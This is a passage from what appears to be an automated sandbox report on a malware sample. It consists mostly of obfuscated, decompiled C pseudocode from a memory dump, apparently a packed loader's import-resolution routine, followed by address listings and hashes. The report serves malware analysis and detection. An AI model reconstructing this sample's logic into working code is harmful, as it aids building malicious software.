							_t733 = _t694 +  *(_t744 + 8);
							_t696 = 0;
							_t250 = _t570 + 0x41d159; // 0x41d159
							 *(_t744 - 0x14) =  *(_t744 - 0x14) & 0x00000000;
							 *_t764 =  *_t764 ^ _t250;
							_t254 = _t570 + 0x41d213; // 0x41d213
							 *(_t744 - 0x10) = 0;
							 *_t764 =  *_t764 + _t254;
							_t538 =  *((intOrPtr*)(_t570 + 0x41f068))( *(_t744 - 0x10),  *(_t744 - 0x14));
							 *(_t744 - 0x14) = _t733;
							 *(_t570 + 0x41d182) =  *(_t570 + 0x41d182) & 0x00000000;
							 *(_t570 + 0x41d182) =  *(_t570 + 0x41d182) ^ (_t733 ^  *(_t744 - 0x14) | _t538);
							_t612 = _t629;
							_t265 = _t570 + 0x41c85c; // 0x41c85c
							 *_t764 =  *_t764 & 0x00000000;
							 *_t764 =  *_t764 | _t265;
							_t266 = _t570 + 0x41c10e; // 0x41c10e
							 *_t764 = _t266;
							_t541 =  *((intOrPtr*)(_t570 + 0x41f068))( *(_t744 - 0x14), _t669);
							 *(_t570 + 0x41ce00) =  *(_t570 + 0x41ce00) & 0x00000000;
							 *(_t570 + 0x41ce00) =  *(_t570 + 0x41ce00) | _t669 & 0x00000000 | _t541;
							_t672 = _t669;
							_push( *(_t744 - 0x14) + 2);
							_pop( *_t273);
							_push( *(_t744 - 0x14));
							_pop( *_t275);
							_t276 = _t570 + 0x41c9a3; // 0x41c9a3
							 *(_t744 - 0x14) =  *(_t744 - 0x14) & 0x00000000;
							 *_t764 =  *_t764 ^ _t276;
							_t280 = _t570 + 0x41d1fa; // 0x41d1fa
							 *_t764 = _t280;
							_t544 =  *((intOrPtr*)(_t570 + 0x41f068))( *(_t744 - 0x14),  *(_t744 - 0x14));
							 *_t764 = _t672;
							 *((intOrPtr*)(_t570 + 0x41d0fe)) = _t544;
							_t657 = 0;
							_t712 = 0 ^  *_t764;
							_t761 =  &(_t764[1]);
							_t284 = _t570 + 0x41d0af; // 0x41d0af
							 *_t761 =  *_t761 & 0x00000000;
							 *_t761 =  *_t761 | _t284;
							_t285 = _t570 + 0x41ceae; // 0x41ceae
							 *_t761 = _t285;
							_t491 =  *((intOrPtr*)(_t570 + 0x41f068))( *(_t744 - 0x10), _t612);
							 *(_t744 - 0x10) = _t696;
							 *(_t570 + 0x41c8cd) =  *(_t570 + 0x41c8cd) & 0x00000000;
							 *(_t570 + 0x41c8cd) =  *(_t570 + 0x41c8cd) ^ _t696 -  *(_t744 - 0x10) ^ _t491;
							_t685 =  *(_t744 - 0x10);
						}
						 *(_t744 - 0x10) = _t572;
						_t575 =  *(_t744 - 0x10);
						_t322 = _t575 + 0x41cb0b; // 0x41cb0b
						 *(_t744 - 0x14) = 0;
						 *_t761 =  *_t761 | _t322;
						_t495 =  *((intOrPtr*)(_t575 + 0x41f060))( *(_t744 - 0x14));
						 *_t761 = _t495;
						_t327 = _t575 + 0x41cda5; // 0x41cda5
						 *_t761 = _t327;
						_t497 =  *((intOrPtr*)(_t575 + 0x41f060))( *(_t744 - 0x14),  *(_t744 - 0x10));
						_t762 = _t761 - 0xfffffffc;
						 *_t762 =  *_t762 ^ _t744;
						_t745 = _t497;
						_t498 = _t745 +  *_t761;
						_t747 = 0;
						 *(_t747 - 0x14) = _t712;
						_t615 =  *(_t575 + 0x41c96a);
						_t715 =  *(_t747 - 0x14);
						if(_t615 > _t498) {
							_t333 = _t575 + 0x41cb0b; // 0x41cb0b
							 *_t762 =  *_t762 & 0x00000000;
							 *_t762 =  *_t762 | _t333;
							_t334 = _t575 + 0x41cda5; // 0x41cda5
							 *(_t747 - 0x14) =  *(_t747 - 0x14) & 0x00000000;
							 *_t762 =  *_t762 | _t334;
							_t498 =  *((intOrPtr*)(_t575 + 0x41f064))( *(_t747 - 0x14), _t747);
						}
						 *_t339 = _t498;
						 *_t341 =  *(_t747 - 0x10);
						_t762[1] =  *(_t747 - 0xc);
						_t577 = _t575;
						_t344 = _t577 + 0x41cee2; // 0x41cee2
						 *_t762 = _t344;
						_t346 = _t577 + 0x41d33a; // 0x41d33a
						 *(_t747 - 0x14) = 0;
						 *_t762 =  *_t762 | _t346;
						_t501 =  *((intOrPtr*)(_t577 + 0x41f068))( *(_t747 - 0x14),  *(_t747 - 0x10), _t615);
						 *(_t577 + 0x41d1da) =  *(_t577 + 0x41d1da) & 0x00000000;
						 *(_t577 + 0x41d1da) =  *(_t577 + 0x41d1da) | _t715 -  *_t762 | _t501;
						_t718 = _t715;
						 *(_t747 - 0x10) = _t685;
						_t688 =  *(_t747 - 0x10);
						 *_t762 =  *_t762 - _t657;
						 *_t762 =  *_t762 ^ (_t501 & 0x00000000 | _t685 ^  *(_t747 - 0x10) |  *(_t747 - 4));
						_t358 = _t577 + 0x41d2b3; // 0x41d2b3
						 *_t762 =  *_t762 - _t657;
						 *_t762 = _t358;
						_t359 = _t577 + 0x41cb87; // 0x41cb87
						 *(_t747 - 0x10) =  *(_t747 - 0x10) & 0x00000000;
						 *_t762 =  *_t762 + _t359;
						_t506 =  *((intOrPtr*)(_t577 + 0x41f068))( *(_t747 - 0x10), _t657, _t657);
						 *(_t747 - 0x10) = _t615;
						 *(_t577 + 0x41cf9a) =  *(_t577 + 0x41cf9a) & 0x00000000;
						 *(_t577 + 0x41cf9a) =  *(_t577 + 0x41cf9a) | _t615 ^  *(_t747 - 0x10) | _t506;
						_t618 =  *(_t747 - 0x10);
						_t763 =  &(_t762[1]);
						 *(_t747 - 0x10) = 0;
						 *_t763 =  *_t763 ^  *_t762;
						_t373 = _t577 + 0x41c922; // 0x41c922
						 *(_t747 - 0x10) = 0;
						 *_t763 =  *_t763 | _t373;
						_t376 = _t577 + 0x41c97d; // 0x41c97d
						 *_t763 =  *_t763 & 0x00000000;
						 *_t763 =  *_t763 + _t376;
						_t511 =  *((intOrPtr*)(_t577 + 0x41f068))(_t618,  *(_t747 - 0x10),  *(_t747 - 0x10));
						 *(_t577 + 0x41cae1) =  *(_t577 + 0x41cae1) & 0x00000000;
						 *(_t577 + 0x41cae1) =  *(_t577 + 0x41cae1) | _t747 & 0x00000000 | _t511;
						_t744 = _t747;
						_t512 =  *((intOrPtr*)(_t577 + 0x41f050))();
						 *(_t744 - 0x14) = 0;
						 *_t763 =  *_t763 + _t512;
						_t385 = _t577 + 0x41c197; // 0x41c197
						 *(_t744 - 0x14) = 0;
						 *_t763 =  *_t763 | _t385;
						_t514 =  *((intOrPtr*)(_t577 + 0x41f060))( *(_t744 - 0x14),  *(_t744 - 0x14));
						 *(_t744 - 0x14) = 0;
						 *_t763 =  *_t763 | _t514;
						_t391 = _t577 + 0x41c46f; // 0x41c46f
						 *(_t744 - 0x14) = 0;
						 *_t763 =  *_t763 ^ _t391;
						_t516 =  *((intOrPtr*)(_t577 + 0x41f060))( *(_t744 - 0x14),  *(_t744 - 0x14));
						_pop( *_t395);
						_t620 = (_t618 & 0x00000000) +  *(_t744 - 0x10);
						 *_t397 = _t516;
						 *(_t744 - 0x14) =  *(_t744 - 0x14) + _t620;
						_push( *(_t744 - 0x14));
						_pop(_t517);
						_t579 = _t577;
						 *(_t744 - 0x10) = _t688;
						_t609 = _t620 & 0x00000000 ^ _t688 -  *(_t744 - 0x10) ^  *(_t579 + 0x41c9d0);
						_t685 =  *(_t744 - 0x10);
						if(_t609 > _t517) {
							_t405 = _t579 + 0x41c197; // 0x41c197
							 *_t763 =  *_t763 & 0x00000000;
							 *_t763 =  *_t763 + _t405;
							_t406 = _t579 + 0x41c46f; // 0x41c46f
							 *(_t744 - 0x10) = 0;
							 *_t763 =  *_t763 ^ _t406;
							_t517 =  *((intOrPtr*)(_t579 + 0x41f064))( *(_t744 - 0x10), _t718);
							 *(_t579 + 0x41cfe1) =  *(_t579 + 0x41cfe1) & 0x00000000;
							 *(_t579 + 0x41cfe1) =  *(_t579 + 0x41cfe1) | _t744 ^  *_t763 ^ _t517;
							_t744 = _t744;
						}
						_t761 =  &(_t763[1]);
						 *_t761 =  *_t761 ^ _t744;
						 *_t761 = _t718;
						 *_t761 = _t517 & 0x00000000 |  *_t763;
						_t522 = 0;
						 *_t761 = _t657;
						 *((intOrPtr*)( *((intOrPtr*)(_t744 - 8)))) = _t522;
						_t660 = 0;
						 *_t415 = _t744;
						 *_t761 = 4;
						_t523 = _t579;
						 *_t417 = 0 ^  *(_t744 - 0x14);
						 *(_t744 - 0x14) =  *(_t744 - 0x14) + _t523;
						_push( *(_t744 - 0x14));
						_pop(_t712);
						_t651 = _t660;
						 *_t422 =  *((intOrPtr*)(_t744 - 8));
						 *(_t744 - 0x10) =  *(_t744 - 0x10) + _t523;
						_push( *(_t744 - 0x10));
						_pop( *_t426);
						_t570 = _t579;
					} while ( *_t712 != 0);
					_t680 = _t685 + 0x14;
					_t701 = _t712;
				} while ( *_t680 != 0 ||  *(_t680 + 0x10) != 0);
				 *_t761 =  *_t761 ^ _t523;
				_t555 = _t523;
				return _t555;
			}

0x02275262
0x02275262
0x02275268
0x0227526f
0x02275272
0x0227527b
0x0227527c
0x0227527f
0x02275282
0x02275288
0x02275290
0x02275297
0x022752a0
0x022752a6
0x022752ac
0x022752ad
0x022752b1
0x022752b4
0x022752ba
0x022752c2
0x022752c9
0x022752d2
0x022752da
0x022752de
0x022752df
0x022752e5
0x022752e6
0x022752ea
0x022752ed
0x022752f3
0x022752f4
0x022752f8
0x022752fb
0x02275303
0x0227530a
0x02275310
0x02275311
0x02275314
0x02275405
0x0227540b
0x0227540c
0x02275413
0x02275417
0x0227541a
0x02275421
0x02275424
0x02275427
0x02275433
0x0227543a
0x02275440
0x0227531a
0x0227531a
0x02275320
0x0227532a
0x0227532d
0x02275333
0x0227533a
0x02275343
0x02275346
0x02275349
0x0227534c
0x0227534d
0x02275356
0x02275359
0x02275365
0x0227536c
0x02275372
0x02275372
0x02275445
0x02275445
0x02275448
0x0227544f
0x02275452
0x02275455
0x0227545d
0x02275464
0x0227546a
0x0227546b
0x0227546e
0x02275477
0x0227547a
0x02275480
0x02275487
0x0227548a
0x02275491
0x02275495
0x02275498
0x022754a0
0x022754a3
0x022754aa
0x022754ad
0x022754b0
0x022754b3
0x022754b4
0x022754b5
0x022754c4
0x022754c6
0x022754cb
0x022754cd
0x022754d6
0x022754d9
0x022754df
0x022754e6
0x022754e9
0x022754e9
0x022754ef
0x022754f7
0x022754fe
0x02275504
0x02275507
0x02275515
0x02275519
0x0227551d
0x02275520
0x02275527
0x0227552b
0x0227552e
0x02275535
0x02275539
0x0227553c
0x02275542
0x0227554a
0x02275551
0x02275557
0x0227555a
0x02275562
0x02275565
0x02275568
0x0227556b
0x0227556e
0x0227556f
0x02275576
0x02275579
0x0227557c
0x02275582
0x0227558c
0x02275595
0x02275596
0x02275599
0x0227559c
0x022755a2
0x022755a5
0x022755a8
0x022755ab
0x022755ad
0x022755b1
0x022755b4
0x022755bb
0x022755be
0x022755c1
0x022755c7
0x022755cf
0x022755d6
0x022755dc
0x022755e8
0x022755eb
0x022755ed
0x022755f0
0x022755f1
0x022755fb
0x022755fe
0x02275607
0x0227560a
0x02275611
0x02275614
0x02275617
0x0227561d
0x02275624
0x02275627
0x0227562f
0x02275632
0x02275635
0x0227563c
0x0227563d
0x02275640
0x0227564e
0x02275650
0x02275653
0x02275655
0x0227565b
0x02275662
0x02275665
0x0227566b
0x02275675
0x02275678
0x0227567e
0x02275685
0x0227568b
0x0227568b
0x02275694
0x0227569c
0x022756a0
0x022756a4
0x022756a6
0x022756a8
0x022756ac
0x022756af
0x022756b8
0x022756bb
0x022756c2
0x022756c6
0x022756c9
0x022756cf
0x022756d6
0x022756dc
0x022756e1
0x022756e4
0x022756e8
0x022756eb
0x022756ee
0x022756f4
0x022756fe
0x02275701
0x02275707
0x0227570f
0x02275716
0x0227571f
0x02275725
0x0227572f
0x02275732
0x02275738
0x02275742
0x02275745
0x0227574b
0x02275753
0x0227575a
0x02275760
0x0227576c
0x0227576f
0x02275777
0x0227577b
0x0227577e
0x02275781
0x0227578a
0x0227578d
0x02275794
0x02275797
0x0227579a
0x022757a0
0x022757a7
0x022757ad
0x022757b0
0x022757b6
0x02275a4d
0x02275a51
0x02275a59
0x02275a5c
0x02275a5f
0x02275a67
0x02275a6e
0x02275a74
0x02275a75
0x02275a7f
0x02275a83
0x02275a8d
0x02275a91
0x02275a94
0x02275a9a
0x02275aa1
0x02275aa7
0x02275aaa
0x02275ab8
0x02275abb
0x02275ac5
0x02275ac9
0x02275acc
0x02275ad2
0x02275ada
0x02275ae1
0x02275ae7
0x022757bc
0x022757bc
0x022757c3
0x022757c6
0x022757c9
0x022757cf
0x022757d9
0x022757dc
0x022757e3
0x022757e6
0x022757e9
0x022757f5
0x022757f8
0x022757fd
0x02275801
0x02275804
0x02275806
0x02275807
0x02275816
0x02275818
0x0227581d
0x0227581f
0x02275826
0x0227582a
0x0227582d
0x02275836
0x02275839
0x02275839
0x02275845
0x0227584c
0x02275852
0x02275854
0x02275858
0x0227585b
0x02275864
0x0227586d
0x0227586e
0x02275871
0x02275874
0x0227587a
0x0227587c
0x02275883
0x02275887
0x0227588a
0x02275890
0x0227589a
0x0227589d
0x022758a3
0x022758aa
0x022758ad
0x022758b9
0x022758bc
0x022758c3
0x022758c6
0x022758c9
0x022758cc
0x022758cd
0x022758ce
0x022758dd
0x022758df
0x022758e4
0x022758e6
0x022758ef
0x022758f2
0x022758f9
0x022758fd
0x02275900
0x02275900
0x02275908
0x0227590f
0x02275915
0x02275918
0x0227591c
0x02275920
0x02275922
0x02275923
0x02275929
0x02275930
0x02275933
0x02275939
0x02275943
0x02275946
0x0227594c
0x02275954
0x0227595b
0x0227596f
0x02275970
0x02275977
0x0227597b
0x0227597e
0x02275987
0x0227598a
0x02275996
0x0227599d
0x022759a3
0x022759a4
0x022759a5
0x022759a8
0x022759ab
0x022759ae
0x022759b4
0x022759bb
0x022759be
0x022759c7
0x022759ca
0x022759d2
0x022759d9
0x022759df
0x022759e2
0x022759e5
0x022759e8
0x022759ef
0x022759f3
0x022759f6
0x022759ff
0x02275a02
0x02275a08
0x02275a10
0x02275a17
0x02275a1d
0x02275a1d
0x02275aea
0x02275af8
0x02275afb
0x02275b01
0x02275b0b
0x02275b0e
0x02275b17
0x02275b1a
0x02275b23
0x02275b26
0x02275b35
0x02275b3a
0x02275b3e
0x02275b41
0x02275b43
0x02275b44
0x02275b4f
0x02275b51
0x02275b56
0x02275b58
0x02275b5f
0x02275b63
0x02275b66
0x02275b6c
0x02275b73
0x02275b76
0x02275b76
0x02275b7d
0x02275b83
0x02275b8e
0x02275b92
0x02275b93
0x02275b9c
0x02275b9f
0x02275ba5
0x02275baf
0x02275bb2
0x02275bbe
0x02275bc5
0x02275bcb
0x02275bcc
0x02275bda
0x02275bde
0x02275be1
0x02275be4
0x02275beb
0x02275bee
0x02275bf1
0x02275bf7
0x02275bfe
0x02275c01
0x02275c07
0x02275c0f
0x02275c16
0x02275c1c
0x02275c28
0x02275c2b
0x02275c35
0x02275c38
0x02275c3e
0x02275c48
0x02275c4b
0x02275c52
0x02275c56
0x02275c59
0x02275c65
0x02275c6c
0x02275c72
0x02275c73
0x02275c79
0x02275c83
0x02275c86
0x02275c8c
0x02275c96
0x02275c99
0x02275c9f
0x02275ca9
0x02275cac
0x02275cb2
0x02275cbc
0x02275cbf
0x02275ccb
0x02275cce
0x02275cd5
0x02275cd8
0x02275cdb
0x02275cde
0x02275cdf
0x02275ce0
0x02275cef
0x02275cf1
0x02275cf6
0x02275cf8
0x02275cff
0x02275d03
0x02275d06
0x02275d0c
0x02275d16
0x02275d19
0x02275d25
0x02275d2c
0x02275d32
0x02275d32
0x02275d3c
0x02275d40
0x02275d43
0x02275d48
0x02275d52
0x02275d55
0x02275d5c
0x02275d5e
0x02275d61
0x02275d68
0x02275d6f
0x02275d74
0x02275d77
0x02275d7a
0x02275d7d
0x02275d7e
0x02275d85
0x02275d88
0x02275d8b
0x02275d8e
0x02275d91
0x02275d92
0x02275da4
0x02275da6
0x02275da7
0x02275dbb
0x02275dbe
0x02275dd0

Memory Dump Source

Source File: 00000000.00000002.240076891.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2616795092f367d06362dbc9c4ea195590f79d012455bc9ff3e9898c1f741067
Instruction ID: e7291459c7a91391214ffd508b2ce58ecbf205071be347c65fbca70d8fc6796d
Opcode Fuzzy Hash: 2616795092f367d06362dbc9c4ea195590f79d012455bc9ff3e9898c1f741067
Instruction Fuzzy Hash: 2E724472844219DFEF04DFA0C9897EEBBF0FF08311F15486ED889AA145D7741664CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 02275378, Relevance: .7, Instructions: 726
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E02275378(signed int __ebx, signed int __ecx, intOrPtr* __edi, signed int __esi) {
				void* _t419;
				void* _t421;
				signed int _t422;
				signed int _t425;
				signed int _t428;
				intOrPtr _t430;
				signed int _t432;
				void* _t434;
				signed int _t435;
				signed int _t438;
				signed int _t443;
				signed int _t449;
				void* _t450;
				signed int _t454;
				void* _t456;
				intOrPtr _t457;
				intOrPtr _t460;
				signed int _t462;
				void* _t463;
				signed int _t465;
				signed int _t470;
				signed int _t472;
				signed int _t475;
				signed int _t478;
				signed int _t482;
				void* _t484;
				void* _t485;
				signed int _t488;
				signed int _t493;
				signed int _t498;
				void* _t499;
				signed int _t501;
				void* _t503;
				signed int _t504;
				intOrPtr _t509;
				signed int _t510;
				signed int _t512;
				void* _t514;
				signed int _t515;
				signed int _t519;
				void* _t521;
				signed int _t522;
				signed int _t525;
				signed int _t528;
				intOrPtr _t531;
				signed int _t539;
				signed int _t541;
				void* _t542;
				signed int _t551;
				signed int _t554;
				signed int _t557;
				signed int _t559;
				signed int _t562;
				void* _t564;
				void* _t566;
				signed int _t573;
				signed int _t575;
				void* _t576;
				signed int _t581;
				signed int _t583;
				void* _t586;
				signed int _t588;
				signed int _t590;
				signed int _t596;
				void* _t599;
				signed int _t602;
				signed int _t605;
				signed int _t607;
				signed int _t610;
				signed int _t612;
				signed int _t614;
				signed int _t616;
				signed int _t619;
				signed int _t622;
				signed int _t626;
				signed int _t629;
				signed int _t632;
				signed int _t635;
				signed int _t638;
				signed int _t641;
				signed int _t644;
				signed int _t647;
				void* _t650;
				signed int _t654;
				signed int _t656;
				signed int _t659;
				signed int _t662;
				intOrPtr* _t665;
				signed int _t667;
				signed int _t670;
				signed int _t673;
				void* _t676;
				signed int _t678;
				void* _t679;
				signed int _t681;
				signed int _t687;
				signed int _t690;
				void* _t691;
				signed int _t693;
				signed int _t694;
				signed int _t697;
				signed int _t700;
				signed int _t703;
				signed int _t714;
				signed int _t717;
				signed int _t718;
				signed int _t726;
				void* _t727;
				signed int _t729;
				signed int* _t739;
				signed int* _t740;
				signed int* _t741;
				signed int* _t742;
				signed int* _t743;
				signed int* _t744;
				signed int* _t745;
				signed int* _t746;
				signed int* _t747;

				_t686 = __esi;
				_t665 = __edi;
				_t551 = __ebx;
				_push(__esi);
				 *_t739 =  *_t739 ^ __esi;
				 *_t739 =  *_t739 | __ebx + 0x0041c174;
				_t419 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_push(_t619);
				 *_t739 =  *_t739 - _t619;
				 *_t739 =  *_t739 + _t419;
				_push(__edi);
				 *_t739 =  *_t739 & 0x00000000;
				 *_t739 =  *_t739 + __ebx + 0x41c53c;
				_t421 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_t740 = _t739 - 0xfffffffc;
				 *(_t726 - 0x14) = _t619;
				_push((__ecx & 0x00000000 ^  *_t739) + _t421);
				_t622 =  *(_t726 - 0x14);
				_pop(_t422);
				 *(_t726 - 0x14) = _t422;
				_t425 =  *(_t726 - 0x14);
				if((0 ^  *(__ebx + 0x41c2dd)) > _t425) {
					 *__esp =  *__esp & 0x00000000;
					 *__esp =  *__esp + __ebx + 0x41c174;
					 *(__ebp - 0x14) =  *(__ebp - 0x14) & 0x00000000;
					 *__esp =  *__esp | __ebx + 0x0041c53c;
					 *((intOrPtr*)(__ebx + 0x41f064))( *(__ebp - 0x14), __ecx);
				}
				 *_t33 = _t425;
				 *_t35 =  *(_t726 - 0x14);
				while(1) {
					L5:
					 *_t36 =  *_t665;
					_t687 =  *(_t726 - 0x14);
					_t38 = _t551 + 0x41d32a; // 0x41d32a
					 *_t740 =  *_t740 & 0x00000000;
					 *_t740 =  *_t740 ^ _t38;
					_t39 = _t551 + 0x41cdb4; // 0x41cdb4
					 *_t740 =  *_t740 ^ _t726;
					 *_t740 = _t39;
					_t428 =  *((intOrPtr*)(_t551 + 0x41f068))(_t726, _t726);
					 *(_t551 + 0x41cada) =  *(_t551 + 0x41cada) & 0x00000000;
					 *(_t551 + 0x41cada) =  *(_t551 + 0x41cada) | _t622 & 0x00000000 ^ _t428;
					_t622 = _t622;
					while(1) {
						_t626 =  *_t740;
						 *_t740 =  *(_t665 + 0x10);
						_t47 = _t551 + 0x41c661; // 0x41c661
						 *_t740 =  *_t740 ^ _t726;
						 *_t740 =  *_t740 + _t47;
						_t430 =  *((intOrPtr*)(_t551 + 0x41f060))(_t622);
						 *_t740 = _t687;
						 *((intOrPtr*)(_t551 + 0x41d31e)) = _t430;
						_t690 = 0;
						 *_t50 = _t726;
						_t51 = _t551 + 0x41c5b3; // 0x41c5b3
						 *_t740 = _t51;
						_t432 =  *((intOrPtr*)(_t551 + 0x41f060))( *(_t726 - 0x10));
						 *(_t726 - 0x14) =  *(_t726 - 0x14) & 0x00000000;
						 *_t740 =  *_t740 ^ _t432;
						_t57 = _t551 + 0x41c868; // 0x41c868
						 *_t740 =  *_t740 & 0x00000000;
						 *_t740 =  *_t740 ^ _t57;
						_t434 =  *((intOrPtr*)(_t551 + 0x41f060))( *(_t726 - 0x14));
						 *_t59 = _t665;
						_t573 = 0 ^  *(_t726 - 0x10);
						 *_t61 = _t434;
						 *(_t726 - 0x14) =  *(_t726 - 0x14) + _t573;
						_push( *(_t726 - 0x14));
						_pop(_t435);
						_t667 = _t665;
						 *(_t726 - 0x14) = _t435;
						_t575 = _t573 & 0x00000000 ^ _t435 & 0x00000000 ^  *(_t551 + 0x41c633);
						_t438 =  *(_t726 - 0x14);
						if(_t575 > _t438) {
							_t68 = _t551 + 0x41c5b3; // 0x41c5b3
							 *_t740 = _t68;
							_t70 = _t551 + 0x41c868; // 0x41c868
							 *(_t726 - 0x10) =  *(_t726 - 0x10) & 0x00000000;
							 *_t740 =  *_t740 | _t70;
							_t438 =  *((intOrPtr*)(_t551 + 0x41f064))( *(_t726 - 0x10),  *(_t726 - 0x14));
						}
						 *(_t726 - 0x10) = _t626;
						 *(_t551 + 0x41c2a0) =  *(_t551 + 0x41c2a0) & 0x00000000;
						 *(_t551 + 0x41c2a0) =  *(_t551 + 0x41c2a0) | _t626 & 0x00000000 ^ _t438;
						_t629 =  *(_t726 - 0x10);
						 *(_t726 - 0x10) = _t551;
						_t554 =  *(_t726 - 0x10);
						 *_t740 =  *_t740 & 0x00000000;
						 *_t740 =  *_t740 | _t438 & 0x00000000 | _t551 & 0x00000000 ^  *(_t726 + 8);
						_t84 = _t554 + 0x41c812; // 0x41c812
						 *_t740 =  *_t740 & 0x00000000;
						 *_t740 =  *_t740 + _t84;
						_t85 = _t554 + 0x41ca65; // 0x41ca65
						 *_t740 =  *_t740 & 0x00000000;
						 *_t740 =  *_t740 | _t85;
						_t443 =  *((intOrPtr*)(_t554 + 0x41f068))(_t575, _t690);
						 *(_t726 - 0x14) = _t667;
						 *(_t554 + 0x41d25f) =  *(_t554 + 0x41d25f) & 0x00000000;
						 *(_t554 + 0x41d25f) =  *(_t554 + 0x41d25f) ^ (_t667 -  *(_t726 - 0x14) | _t443);
						_t670 =  *(_t726 - 0x14);
						 *_t94 = _t575;
						 *_t740 =  *_t740 ^ _t690;
						_push( *((intOrPtr*)(_t726 - 8)));
						_pop(_t691);
						 *((intOrPtr*)(_t726 - 8)) = _t691 +  *(_t726 - 0x10);
						_t693 = 0;
						_t98 = _t554 + 0x41d15d; // 0x41d15d
						 *_t740 =  *_t740 - _t575;
						 *_t740 = _t98;
						_t99 = _t554 + 0x41c260; // 0x41c260
						 *(_t726 - 0x10) = 0;
						 *_t740 =  *_t740 | _t99;
						_push( *((intOrPtr*)(_t554 + 0x41f068))( *(_t726 - 0x10), _t575));
						_pop( *_t103);
						_push( *(_t726 - 0x10));
						_pop( *_t105);
						_push( *((intOrPtr*)(_t670 + 0xc)));
						_pop( *_t107);
						_push( *(_t726 - 0x14));
						_pop(_t576);
						 *_t740 =  *_t740 & 0x00000000;
						 *_t740 =  *_t740 + _t576;
						_t109 = _t554 + 0x41ca52; // 0x41ca52
						 *_t740 =  *_t740 - _t554;
						 *_t740 =  *_t740 + _t109;
						_t449 =  *((intOrPtr*)(_t554 + 0x41f060))(_t554, _t554);
						 *(_t726 - 0x14) = _t629;
						 *(_t554 + 0x41cd09) =  *(_t554 + 0x41cd09) & 0x00000000;
						 *(_t554 + 0x41cd09) =  *(_t554 + 0x41cd09) | _t629 -  *(_t726 - 0x14) ^ _t449;
						_t632 =  *(_t726 - 0x14);
						_t741 = _t740 - 0xfffffffc;
						_push(0);
						 *_t741 =  *_t741 | _t449;
						_push( *_t740);
						_pop(_t450);
						 *_t741 = _t450 +  *(_t726 + 8);
						_t120 = _t554 + 0x41c07f; // 0x41c07f
						 *_t741 = _t120;
						_t454 =  *((intOrPtr*)(_t554 + 0x41f060))( *(_t726 - 0x10),  *(_t726 - 0x14));
						 *_t741 =  *_t741 - _t632;
						 *_t741 =  *_t741 | _t454;
						_t123 = _t554 + 0x41d248; // 0x41d248
						 *(_t726 - 0x14) =  *(_t726 - 0x14) & 0x00000000;
						 *_t741 =  *_t741 | _t123;
						_t456 =  *((intOrPtr*)(_t554 + 0x41f060))( *(_t726 - 0x14), _t632);
						_t581 =  *_t741;
						_t742 =  &(_t741[1]);
						 *(_t726 - 0x10) = _t554;
						_push(_t581 + _t456);
						_t557 =  *(_t726 - 0x10);
						_pop(_t457);
						_t583 = _t581 & 0x00000000 ^ _t632 -  *_t742 ^  *(_t557 + 0x41d0e6);
						_t635 = _t632;
						if(_t583 > _t457) {
							_t131 = _t557 + 0x41c07f; // 0x41c07f
							 *(_t726 - 0x14) =  *(_t726 - 0x14) & 0x00000000;
							 *_t742 =  *_t742 + _t131;
							_t135 = _t557 + 0x41d248; // 0x41d248
							 *(_t726 - 0x14) = 0;
							 *_t742 =  *_t742 | _t135;
							_t457 =  *((intOrPtr*)(_t557 + 0x41f064))( *(_t726 - 0x14),  *(_t726 - 0x14));
							 *(_t726 - 0x10) = _t693;
							 *((intOrPtr*)(_t557 + 0x41cd68)) = _t457;
							_t693 =  *(_t726 - 0x10);
						}
						_pop( *_t142);
						 *_t742 = _t583 & 0x00000000 ^  *(_t726 - 0x10);
						_t586 = _t693;
						_t694 = _t586 +  *(_t726 + 8);
						_t588 = 0;
						 *_t742 =  *_t742 & 0x00000000;
						 *_t742 =  *_t742 | _t588;
						_t145 = _t557 + 0x41d135; // 0x41d135
						 *_t742 = _t145;
						_t147 = _t557 + 0x41c60e; // 0x41c60e
						 *_t742 =  *_t742 & 0x00000000;
						 *_t742 =  *_t742 | _t147;
						_t460 =  *((intOrPtr*)(_t557 + 0x41f068))(_t588,  *(_t726 - 0x10), _t457);
						 *(_t726 - 0x14) = _t635;
						 *((intOrPtr*)(_t557 + 0x41c3e6)) = _t460;
						_t638 =  *(_t726 - 0x14);
						_t590 =  *_t742;
						_t743 = _t742 - 0xfffffffc;
						 *_t743 =  *_t743 - _t638;
						 *_t743 =  *_t743 ^ _t590;
						_t152 = _t557 + 0x41c220; // 0x41c220
						 *(_t726 - 0x14) = 0;
						 *_t743 =  *_t743 + _t152;
						_t462 =  *((intOrPtr*)(_t557 + 0x41f060))( *(_t726 - 0x14), _t638);
						 *(_t726 - 0x10) = _t590;
						 *(_t557 + 0x41cf1d) =  *(_t557 + 0x41cf1d) & 0x00000000;
						 *(_t557 + 0x41cf1d) =  *(_t557 + 0x41cf1d) ^ (_t590 ^  *(_t726 - 0x10) | _t462);
						_t463 =  *((intOrPtr*)(_t557 + 0x41f054))();
						 *(_t726 - 0x14) = 0;
						 *_t743 =  *_t743 + _t463;
						_t166 = _t557 + 0x41c49b; // 0x41c49b
						 *(_t726 - 0x10) = 0;
						 *_t743 =  *_t743 + _t166;
						_t465 =  *((intOrPtr*)(_t557 + 0x41f060))( *(_t726 - 0x10),  *(_t726 - 0x14));
						 *(_t726 - 0x14) = _t694;
						 *(_t557 + 0x41c8aa) =  *(_t557 + 0x41c8aa) & 0x00000000;
						 *(_t557 + 0x41c8aa) =  *(_t557 + 0x41c8aa) | _t694 & 0x00000000 ^ _t465;
						_t697 =  *(_t726 - 0x14);
						_t744 = _t743 - 0xfffffffc;
						 *(_t726 - 0x10) = _t638;
						 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
						 *(_t726 - 4) =  *(_t726 - 4) ^ _t638 -  *(_t726 - 0x10) ^ _t465 & 0x00000000 ^  *_t743;
						_t641 =  *(_t726 - 0x10);
						_t183 = _t557 + 0x41c279; // 0x41c279
						 *_t744 = _t183;
						_t185 = _t557 + 0x41d1ea; // 0x41d1ea
						 *_t744 =  *_t744 - _t697;
						 *_t744 = _t185;
						_t470 =  *((intOrPtr*)(_t557 + 0x41f068))(_t697,  *(_t726 - 0x14));
						 *(_t726 - 0x14) =  *(_t726 - 0x10);
						 *(_t557 + 0x41cbc5) = 0 ^ _t470;
						_t596 =  *(_t726 - 0x14);
						do {
							L11:
							if(( *_t697 & 0x80000000) != 0) {
								_t744[1] =  *_t697;
